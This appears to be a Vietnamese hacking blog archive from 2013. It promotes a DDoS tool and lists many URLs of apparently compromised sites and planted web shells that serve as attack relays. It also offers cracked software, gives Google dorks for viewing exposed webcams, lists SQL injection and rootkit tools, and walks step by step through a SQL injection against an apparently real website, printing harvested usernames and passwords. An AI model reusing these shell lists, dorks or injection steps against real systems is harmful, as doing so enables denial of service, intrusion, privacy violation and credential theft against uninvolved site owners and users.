Recent post
Archive for 2013
Chà lâu quá không viết blog, hôm nay tôi xin mạo mụi ra mắt cái tool DDoS "cỏm" code đơn giản .
Giao diện :
Giao diện :
Hướng dẫn sử dụng :
1. Import danh sách địa chỉ shell boot ( ex : http://abc.com/shell.php . Lưu ý là không có dấu "/" ở cuối nhé )
2. Nhập victim muốn attack sau đó bấm Attack và chờ đợi :">
Source Shell Boot : http://pastebin.com/UwuQ8ZMa
Tải về máy : http://upfile.vn/eaxz
Source :
- http://www.bjdxyq.com/index.html
- http://www.shengmingyuan.net/index.html
- http://www.fjnh.gov.cn/index.html
- http://www.czkx.gov.cn/index.html
- http://gmhstudents.com/index.html
- http://gj.guocedc.cn/index.html
- http://www.kaiqq.com/index.html
- http://www.fzbtd.com/index.html
- http://www.ahucx.com/index.html
- http://gzxx.hcedu.cn/index.html
- http://www.bzjspx.net/index.html
- http://www.beans-company.ne.jp/index.html
- http://hncsmd.hnipp.com/index.html
- http://gdmjs.com/index.html
- http://natureboon.net/index.html
- http://5152255.com/index.html
- http://natureboon.cn/index.html
- http://ordro.cn/index.html
- http://beachsideroofinghawaii.com/index.html
- http://tdx.fzu.edu.cn/index.html
- http://www.chnfc.com/index.html
- http://bjlin.redian163.cn/index.html
- http://www.gxydgolf.com/index.html
- http://vitcorp.vn/index.html
- http://bjcrb.com/index.html
- http://flash-style.com/index.html
- http://www.heller-expo.com/index.html
- http://ytxsoft.com/index.html
- http://extranet.dpi-solutions.com/index.html
- http://qc.rongyuan.cn/index.html
- http://www.chnfc.com/index.html
- http://idealincorporation.com/index.html
- http://extranet.dpi-solutions.com/index.html
- http://emesventure.com/index.html
- http://www.czszyyy.com/index.html
- http://ychzl.bsd106.com/index.html
- http://luntan.handkoo.com/index.html
- http://www.fj-zhengzhang.cn/index.html
- http://www.harmonypack.cn/index.html
- http://dpht.xchjcy.gov.cn/index.html
- http://www.handkoo.com/index.html
- http://tzb.lzjtu.edu.cn/index.html
- http://dph.xchjcy.gov.cn/index.html
- http://www.bsyjga.gov.cn/index.html
- http://report.xchjcy.gov.cn/index.html
- http://gjh.xchjcy.gov.cn/index.html
- http://blog.xchjcy.gov.cn/index.html
- http://httpfbkab.xchjcy.gov.cn/index.html
- http://blog.dfyytsg.com/index.html
- http://forum.xchjcy.gov.cn/index.html
- http://xxf.xchjcy.gov.cn/index.html
- http://shengchicar.com/index.html
- http://bbs.csvsj.com/index.html
- http://bbs.activesoft.com.cn/index.html
- http://www.fengyi668.com/index.html
- http://www.xjhltl.com/index.html
- http://www.dfyytsg.com/index.html
- http://www.dywater.gov.cn/index.html
- http://www.campidoriselections.com/index.html
- http://www.ordroshop.cn/index.html
- http://ga.10.gov.cn/index.html
- http://www.ally-ec.com/index.html
- http://www.cxgsj.cn/index.html
- http://oa.nbxsws.gov.cn/index.html
- http://kfq.tslr.gov.cn/index.html
- http://www.ybsxs.com/index.html
- http://pro-latam.com/index.html
- http://dpht.xchjcy.gov.cn/index.html
- http://eurotransmobile.com/index.html
- http://www.kfzy.sdnu.edu.cn/index.html
- http://www.lefedv.com/index.html
- http://www.zzstmc.com/index.html
- http://projects.amigo-software.com/index.html
- http://www.cxgsj.cn/index.html
- http://gdmjs.com/index.html
- http://x-xam-org.xchjcy.gov.cn/index.html
- http://lahaciendaresidencial.com/index.html
- http://www.qddajiang.com/index.html
- http://flyz.qzsfj.gov.cn/index.html
- http://www.hzgsfda.gov.cn/index.html
- http://www.ljmjfj.com/index.html
- http://gdyingteng.com/index.html
- http://www.lqczzl.com/index.html
- http://disk.camc.cc/index.html
- http://ftiweb.off.fti.or.th/index.html
- http://www.lsqqby.cn/index.html
- http://fr.rongyuan.cn/index.html
- http://gov.xchjcy.gov.cn/index.html
- http://temp.hnipp.com/index.html
- http://www.pzhzzyy.com/index.html
- http://www.591pqk.com/index.html
- http://www.melroseschools.com/index.html
- http://bmwz.pingxiang.gov.cn/index.html
- http://www.fengyi668.com/index.html
- http://www.591pqk.com/index.html
- http://www.indal2000.it/index.html
- http://5152255.com/index.html
- http://www.indal2000.it/index.html
- http://www.szwyh.cn/index.html
- http://www.hxzdsys.sdnu.edu.cn/index.html
- http://www.vintagefaucet.net/index.html
- http://www.lanshuidesign.com/index.html
- http://whysx.com/index.html
- http://shippingassociation.com/index.html
- http://www.tzgps.com/index.html
- http://www.hnjjdd.com/index.html
- http://www.kfzy.sdnu.edu.cn/index.html
- http://shippingassociation.com/index.html
- http://www.vintagefaucet.net/index.html
- http://www.sylvsha.com/index.html
- http://www.stzsj.gov.cn/index.html
* Dưới đây là toàn bộ Shell Boot từ Razer DDOS Ultimate . Nói đúng hơn là toàn bộ sức mạnh của nó nằm ở đây huh :D
http://phim.duoi.net/wp-includes/razer.php
http://phim.duoi.net/wp-includes/razer.php
http://anluc.com.vn/forum/razer.php
http://www.caycanhdatviet.vn/images/razer.php
http://www.xinbangchem.com/users.php
http://angelnailsmontgomery.com/wp-admin/network/razer.php
http://ranjanasind.com/wp-admin/razer.php
http://virtuallyepic.com/storage/images/razer.php
http://nhac.phatca.com/razer.php
http://www.dulichhoabinh.com/wp-content/uploads/razer.php
http://www.dulichhoabinh.com/wp-content/uploads/razer.php
http://www.wallet8.com/users.php
http://www.wallet8.com/users.php
http://freehotlayouts.us/404.php
http://phim.duoi.net/wp-includes/razer.php
http://osraminside.vn/nivo-slider/js/razer.php
http://www.bigsale.net.vn/images/razer.php
http://www.wallet8.com/users.php
http://www.dulichhoabinh.com/wp-content/uploads/razer.php
http://www.owyheeair.com/js/ClientAPITests/pp8.php
http://visualfoodplanner.com/404.php
http://www.dulichhoabinh.com/wp-content/uploads/razer.php
http://khcnhagiang.gov.vn/wins/icon/521/users.php
http://www.owyheeair.com/js/ClientAPITests/pp8.php
http://rqxh.gov.cn/users.php.php
http://dochoithuanthanh.com/images/tintuc/razer.php
http://kaodenuit.free.fr/post.php
http://phim.duoi.net/wp-includes/razer.php
http://inox-master.com/inc/users.php
http://dochoithuanthanh.com/images/tintuc/razer.php
http://www.fptnhatrang.com/images/SanPham/users.php
http://www.dulichhoabinh.com/wp-content/uploads/razer.php
http://www.fptnhatrang.com/images/SanPham/users.php
http://www.fptnhatrang.com/images/SanPham/users.php
http://thammyvienmychi.orv.vn/admin/module/razer.php
http://ruouxuatnhapkhau.com/images/flash/razer.php
http://angelnailsmontgomery.com/wp-includes/js/razer.php
http://angelnailsmontgomery.com/wp-includes/js/razer.php
http://thammyvienmychi.orv.vn/admin/module/razer.php
http://www.fptnhatrang.com/images/SanPham/users.php
http://evresisdiagnostic.com/images/news/razer.php
http://kaodenuit.free.fr/post.php
http://thammyvienmychi.orv.vn/admin/module/razer.php
http://thptlaiuyen.edu.vn/vanban/razer.php
http://www.enter24h.com/components/com_users/helpers/kai/razer.php
http://www.cafezoide.asso.fr/joomla/templates/atomic/razer.php
http://thammyvienmychi.orv.vn/admin/module/razer.php
http://www.appliplast.fr/templates/inspiration-et/razer.php
http://thammyvienmychi.orv.vn/admin/module/razer.php
http://apodiafazzi.internox.com/includes/Archive/razer.php
http://apodiafazzi.internox.com/includes/Archive/razer.php
http://www.veancan.com/libraries/razer.php
http://muabanbdsvang.com/media/razer.php
http://dulichtruyenthong.com/web/images/prod/razer.php
http://www.dulichhoabinh.com/wp-content/uploads/razer.php
http://viet-tech.com.vn/logs/razer.php
http://viet-tech.com.vn/logs/razer.php
http://dulichtruyenthong.com/web/images/prod/razer.php
http://thammyvienmychi.orv.vn/admin/module/razer.php
http://ranjanasind.com/wp-admin/razer.php
http://ranjanasind.com/wp-admin/razer.php
http://phim.duoi.net/wp-includes/razer.php
http://tanaudio.com.vn/users.php
http://tanaudio.com.vn/users.php
http://tanaudio.com.vn/users.php
http://8tube.tk/razer.php
http://tanaudio.com.vn/users.php
http://www.dulichhoabinh.com/wp-content/uploads/razer.php
http://angelnailsmontgomery.com/wp-includes/js/razer.php
http://tanaudio.com.vn/users.php
http://0x534b.blogspot.com
- VPN hẳn ai cũng đã nghe nhưng tôi chưa biết có xài chưa :D . Nhưng thôi cũng tạo điều kiện cho ai muốn xài ^^
- Dưới đây là bảng crack của VPNIUM mới nhất .
Giao diện sau khi crack :
- Trang chủ : http://vpnium.com/
- Download Setup : http://vpnium.com/page/start
Password : vì tôn trọng người làm ra cái này nên mình sẽ giới hạn lại . Các bạn hãy để lại email :)
Please comment your email for password
- Dưới đây là bảng crack của VPNIUM mới nhất .
Giao diện sau khi crack :
- Download Setup : http://vpnium.com/page/start
- Download Cracked : Hide Content
Password : vì tôn trọng người làm ra cái này nên mình sẽ giới hạn lại . Các bạn hãy để lại email :)
Please comment your email for password
- Bộ tools này thực ra tôi cũng crack khá lâu rồi nhưng vì link cũ bị xóa nên tôi post lại bài này cho ai cần nó :)
- 1 số giao diện :
- Trang chủ : http://electronicpromo.net/tool/
- Prince : 5$ -> 10$
- Virus Scan : https://www.virustotal.com/en/file/9fbb2e98207a0c732af7e011b952ed3676e4075af2f6ffd300bce7f0cfcc1c07/analysis/1377065399/
- Password : scriptkiddies
- 1 số giao diện :
- Prince : 5$ -> 10$
- Crack File Download : Content Hide
- Virus Scan : https://www.virustotal.com/en/file/9fbb2e98207a0c732af7e011b952ed3676e4075af2f6ffd300bce7f0cfcc1c07/analysis/1377065399/
- Password : scriptkiddies
1. Go to Google and search for "inurl:view/view.shtml" (without quote).
2. Now open any of the link from the search result and enjoy.
3. Below is the list of google dork you can use to see more cams.
3. Below is the list of google dork you can use to see more cams.
- inurl:/view.shtml
- intitle:”Live View / - AXIS” | inurl:view/view.shtml^
- inurl:ViewerFrame?Mode=
- inurl:ViewerFrame?Mode=Refresh
- inurl:axis-cgi/jpg
- inurl:axis-cgi/mjpg (motion-JPEG)
- inurl:view/indexFrame.shtml
- inurl:view/index.shtml
- inurl:view/view.shtml
- intitle:start inurl:cgistart
- intitle:”live view” intitle:axis
- liveapplet
- intitle:snc-z20 inurl:home/
- intitle:liveapplet
- intitle:”i-Catcher Console - Web Monitor”
- intitle:axis intitle:”video server”
- intitle:liveapplet inurl:LvAppl
- intitle:”EvoCam” inurl:”webcam.html”
- intitle:”Live NetSnap Cam-Server feed”
- intitle:”Live View / - AXIS”
- intitle:”Live View / - AXIS 206W”
- intitle:”Live View / - AXIS 210″
- inurl:indexFrame.shtml Axis
- intitle:”Live View / - AXIS 206M”
- inurl:”MultiCameraFrame?Mode=Motion”
- allintitle:”Network Camera NetworkCamera”
- intitle:”WJ-NT104 Main Page”
- intext:”MOBOTIX M1″ intext:”Open Menu”
- intext:”MOBOTIX M10″ intext:”Open Menu”
- intext:”MOBOTIX D10″ intext:”Open Menu”
- intitle:”netcam live image”
- intitle:snc-cs3 inurl:home/
- intitle:snc-rz30 inurl:home/
- intitle:”sony network camera snc-p1″
- intitle:”sony network camera snc-m1″
- site:.viewnetcam.com -www.viewnetcam.com
- intitle:”Toshiba Network Camera”
Features:
Multi-platform.
User-friendly graphical interface.
Multithreaded.
Dump.
Customise your queries
Create your custom plugins to automate attacks
User-friendly graphical interface.
Multithreaded.
Dump.
Customise your queries
Create your custom plugins to automate attacks
Supported for today:
POST, GET, Headers (User-Agent, C*****, Referer, X-Forwarded-For, Custom Header …)
MSSQL >=2000 and MySQL>=5.0
MSSQL >=2000 and MySQL>=5.0
Injection methods supported for today:
Error based injection.
Union based injection (using subquery).
Blind (time and boolean based)
Union based injection (using subquery).
Blind (time and boolean based)
enema_fw-1.71-install.exe Windows x86 installer
enema_fw-1.71-source.zip Multiplatform source
enema_fw-1.71-source.zip Multiplatform source
http://code.google.com/p/enema/downloads/list
| # | Tên | Chức năng | Tải về |
|---|---|---|---|
| 1 | Acunetix | Read Here | Bấm vào đây |
| 2 | M-Rootkit | Read Here | Bấm vào đây |
| 3 | Havij 1.15 | Sql Injection | Bấm vào đây |
| 4 | Web Vuln Scan | Scan Vuln | Bấm vào đây |
| 5 | Hidden File Finder | Scan and discover all the Hidden files on your Windows | Bấm vào đây |
| 6 | Patator v0.5 | Multi-purpose brute-forcer, with a modular design and a flexible usage | Bấm vào đây |
Xin chào, hôm nay tôi sẽ tiếp tục bài viết nói về vấn đề Sql Injection .
I. Sql Injection là gì ?
SQL injection là một kỹ thuật cho phép những kẻ tấn công lợi dụng lỗ hổng của việc kiểm tra dữ liệu đầu vào trong các ứng dụng web và các thông báo lỗi của hệ quản trị cơ sở dữ liệu trả về để inject (tiêm vào) và thi hành các câu lệnh SQL bất hợp pháp, Sql injection có thể cho phép những kẻ tấn công thực hiện các thao tác, delete, insert, update,… trên cơ sỡ dữ liệu của ứng dụng, thậm chí là server mà ứng dụng đó đang chạy, lỗi này thường xãy ra trên các ứng dụng web có dữ liệu được quản lý bằng các hệ quản trị cơ sở dữ liệu như SQL Server, MySQL, Oracle, DB2, Sysbase... ( theo wiki )
Đọc thêm tại : http://vi.wikipedia.org/wiki/SQL_injection , mọi thứ bạn cần đọc về nó đều được ghi cụ thể tại đây nên tôi không nhắc lại nữa.
II. Phương pháp tấn công Sql Injection đơn giản.
- Ở đây tôi sẽ hướng dẫn cụ thể về phương pháp này và bài sau tôi sẽ hướng dẫn vượt mặt bộ lọc kiểm tra !
1. Kiểm tra lỗi
Thường thì để kiểm tra lỗi chúng ta sẽ thêm dấu " ' " sau đường link có dạng ?id= hay ?product= ..vv. nếu giao diện website có thay đổi chúng ta biết rằng nó đã dính Sql .
2. Tìm số trường cột
Để tìm số trường cột ta sử dụng câu lệnh truy vấn Order by [số trường cột] -- -
VD : http://www.abc-consultancy.com/newsitem.php?id=29 order by 10-- - : không có biểu hiện gì hết thử hạ xuống xem như thế nào
http://www.abc-consultancy.com/newsitem.php?id=29 order by 8-- - : cũng không có biểu hiện gì hết hạ tiếp
http://www.abc-consultancy.com/newsitem.php?id=29 order by 7-- - : và chúng ta thấy nội dung đã hiển thị chứng tỏ số trường cột của site là 7
Bắt đầu truy vấn , để xem table nó nằm ở trường cột nào ta sử dụng lệnh Union Select 1,2,3,4,5,6,7-- - với 1,2,3,4,5,6,7 là thứ tự số trường cột ! Ngoài ra trước ?id=29 ta sẽ thêm dấu - để hiện các con số đẹp .
3. Lấy tên table :
Ta thấy có 2 con số hiện ra và chúng ta sẽ truy vấn ở trường cột số 5
Và thông tin table ta thu được :
cms_kladblok,cms_links,mailinglist_1,mailinglist_2,mailinglist_3,mailinglist_4,main,newsletter_defaults,newsletter_letter,pub_dokuman,pub_menu,tapugarantie,users,website_dynpage,website_en_mainmenu_links,website_form,website_mainmenu,website_news,website_nl_mainmenu_links,website_publication
Table này sẽ chứa username và password nhưng chưa chắc luôn là vậy nên chúng ta sẽ xem thử tên column trong table đó là gì
4. Xuất ra Column Username và Password trong table Users
Ta chỉ thay đổi table thành column và thêm and table_name=0x7573657273 ( 0x7573657273 là Users được chuyển từ String sang Hex . Có thể chuyển đổi tại đây : http://string-functions.com/string-hex.aspx )
Thông tin ta thu được : id,sesid,username,password,namesurname,songiris,admin
5. Xuất thông tin Username và Password .
- Tới đây ta lượt bỏ bớt và thay vào đó chỉ còn lại là :
0x2f là ký tự ngăn cách giữa username và password ở đây tôi vẫn chuyển từ string sang hex " / " . Và ta có được : serhatoren/kem07er,Levent/oz07ak,ss/abc07,Burak/abc123
6. Giải mã mật khẩu .
- Tuy nhiên hầu hết các website bây giờ đều mã hóa mật khẩu chủ yếu là MD5 nên các bạn có thể sử dụng các website trâ cứu mật khẩu MD5 như :
Đây là 3 website tôi nghĩ nó giúp ích rất nhiều cho attacker hiện nay :D
Kết thúc ! Bài tiếp theo tôi sẽ tiếp tục hướng dẫn kỹ thuật bypass như XSS !
